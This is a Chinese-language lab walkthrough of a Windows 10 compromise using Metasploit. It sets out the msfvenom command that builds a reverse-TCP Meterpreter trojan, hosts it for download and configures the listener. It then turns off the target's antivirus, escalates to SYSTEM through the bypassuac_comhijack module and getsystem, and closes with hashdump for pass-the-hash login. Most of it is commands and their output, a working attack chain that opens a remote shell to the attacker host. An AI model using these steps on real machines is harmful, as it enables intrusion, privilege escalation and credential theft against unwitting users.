环境准备:
名称 | 系统 | 位数 | IP |
攻击机 | Kali Linux | 64 | 192.168.88.132 |
用户机 | Windows 10 | 64 | 192.168.88.137 |
一、生成木马
1.在kali机器上生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.88.132 LPORT=12345 -f exe -o shell.exe
2.开启http.server服务方便下载木马
python3 -m http.server 9999
二、Kali开启监听
1.开启MSF
┌──(root㉿Kali)-[~]
└─# msfconsole
2.使用监听模块
msf6 > use exploit/multi/handler
# 输出
[*] Using configured payload generic/shell_reverse_tcp
3.设置payload
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
# 输出
payload => windows/x64/meterpreter/reverse_tcp
4.设置监听IP(此IP为攻击机IP)
msf6 exploit(multi/handler) > set lhost 192.168.88.132
# 输出
lhost => 192.168.88.132
5.设置监听端口
msf6 exploit(multi/handler) > set lport 12345
# 输出
lport => 12345
6.运行
msf6 exploit(multi/handler) > run
# 输出
[*] Started reverse TCP handler on 192.168.88.132:12345
三、用户机运行
1.模拟下载木马(因为没做免杀要把防火墙和防病毒全部关掉)
进入网址http://192.168.88.132:12345,下载名为shell的木马。
2.点击运行木马
四、获取权限
1.当出现meterpreter,表示已经入侵成功
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.88.132:12345
[*] Sending stage (201798 bytes) to 192.168.88.137
[*] Meterpreter session 1 opened (192.168.88.132:12345 -> 192.168.88.137:64376) at 2024-04-21 15:39:57 +0800
meterpreter >
2.查看权限
meterpreter > getuid
# 输出
Server username: WIN10-1\Administrator
3.尝试抓取哈希值,提示权限不够
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: 1168
4.尝试提权(还是不行,接着在换个方法)
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
5.先用background把当前会话挂起,切换到msf目录下使用bypassuac模块来绕过uac的限制(这个方法比较看运气有可能成功,也有可能失败,需要多试几次),结果可以看到返回了多条可利用的漏洞模块信息。
6.尝试利用一个漏洞模块进行攻击
利用其中的06模块,进行攻击,使用use 6进入到模块中。
msf6 exploit(multi/handler) > use 6
# 输出
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_comhijack) >
7.它提示没有payload,现在就给它设置一个payload
msf6 exploit(windows/local/bypassuac_comhijack) > set payload windows/x64/meterpreter/reverse_tcp
# 输出
payload => windows/x64/meterpreter/reverse_tcp
8.设置已开启的会话连接
上面已经配置好了攻击模块,将它设置成已有的session连接会话1。
msf6 exploit(windows/local/bypassuac_comhijack) > set session 1
# 输出
session => 1
9.开始攻击,直接run
结果显示:利用bypassuac漏洞模块对目标主机发起了攻击,成功绕过UAC限制,“Meterpreter session 2 opened ”–表明已经开通了192.168.88.132:4444和192.168.88.137:64588的新会话连接2。
10,现在查看权限
meterpreter > getuid
# 输出
Server username: WIN10-1\Administrator
还不是最高权限。
11.再次使用getsystem提权
meterpreter > getsystem
# 输出
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
12,再查看权限
meterpreter > getuid
# 输出
Server username: NT AUTHORITY\SYSTEM
结果显示我们已经拿到了最权限system。
13.现在在抓取hash值,就完成了,可以用LMhash进行远程登录。